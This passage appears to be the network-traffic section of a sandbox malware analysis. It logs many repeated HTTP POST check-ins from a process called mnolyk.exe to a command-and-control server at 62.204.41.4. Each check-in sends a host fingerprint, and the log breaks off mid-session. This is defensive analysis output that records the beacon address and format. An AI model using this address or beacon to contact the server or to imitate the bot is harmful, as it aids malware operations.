                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      345 | 192.168.2.7 | 50040 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:35.106091976 CET | 460 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:35.169405937 CET | 460 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      346 | 192.168.2.7 | 50041 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:35.406745911 CET | 461 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:35.470330954 CET | 461 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      347 | 192.168.2.7 | 50042 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:36.263611078 CET | 462 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:36.325232983 CET | 462 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      348 | 192.168.2.7 | 50043 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:36.948525906 CET | 463 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:37.014750957 CET | 463 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      349 | 192.168.2.7 | 50044 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:37.214832067 CET | 464 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:37.280854940 CET | 464 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      35 | 192.168.2.7 | 49729 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:10.061029911 CET | 139 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:10.126115084 CET | 139 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      350 | 192.168.2.7 | 50045 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:37.461652040 CET | 465 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:37.524796009 CET | 465 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      351 | 192.168.2.7 | 50046 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:37.701236963 CET | 466 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:37.763130903 CET | 466 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      352 | 192.168.2.7 | 50047 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:37.932300091 CET | 467 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:37.994133949 CET | 467 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      353 | 192.168.2.7 | 50048 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:38.164092064 CET | 468 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:38.228632927 CET | 468 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      354 | 192.168.2.7 | 50049 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:38.401505947 CET | 469 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:38.466819048 CET | 469 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      355 | 192.168.2.7 | 50050 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:38.652718067 CET | 470 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:38.718818903 CET | 470 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      356 | 192.168.2.7 | 50051 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:38.908724070 CET | 471 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:38.970972061 CET | 471 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      357 | 192.168.2.7 | 50052 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:39.150059938 CET | 472 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:39.214437008 CET | 472 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      358 | 192.168.2.7 | 50053 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:39.384368896 CET | 473 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:39.449167967 CET | 473 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      359 | 192.168.2.7 | 50054 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:39.617227077 CET | 474 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:39.679996967 CET | 474 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      36 | 192.168.2.7 | 49730 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:10.313178062 CET | 140 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:10.379033089 CET | 140 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      360 | 192.168.2.7 | 50055 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:39.857527018 CET | 475 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:39.919043064 CET | 475 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      361 | 192.168.2.7 | 50056 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:40.088529110 CET | 476 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:40.152849913 CET | 476 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      362 | 192.168.2.7 | 50057 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:40.336370945 CET | 477 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:40.399558067 CET | 477 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      363 | 192.168.2.7 | 50058 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:40.571513891 CET | 478 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:40.634928942 CET | 478 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      364 | 192.168.2.7 | 50059 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:40.814145088 CET | 479 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:40.878601074 CET | 479 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      365 | 192.168.2.7 | 50060 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:41.073046923 CET | 480 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
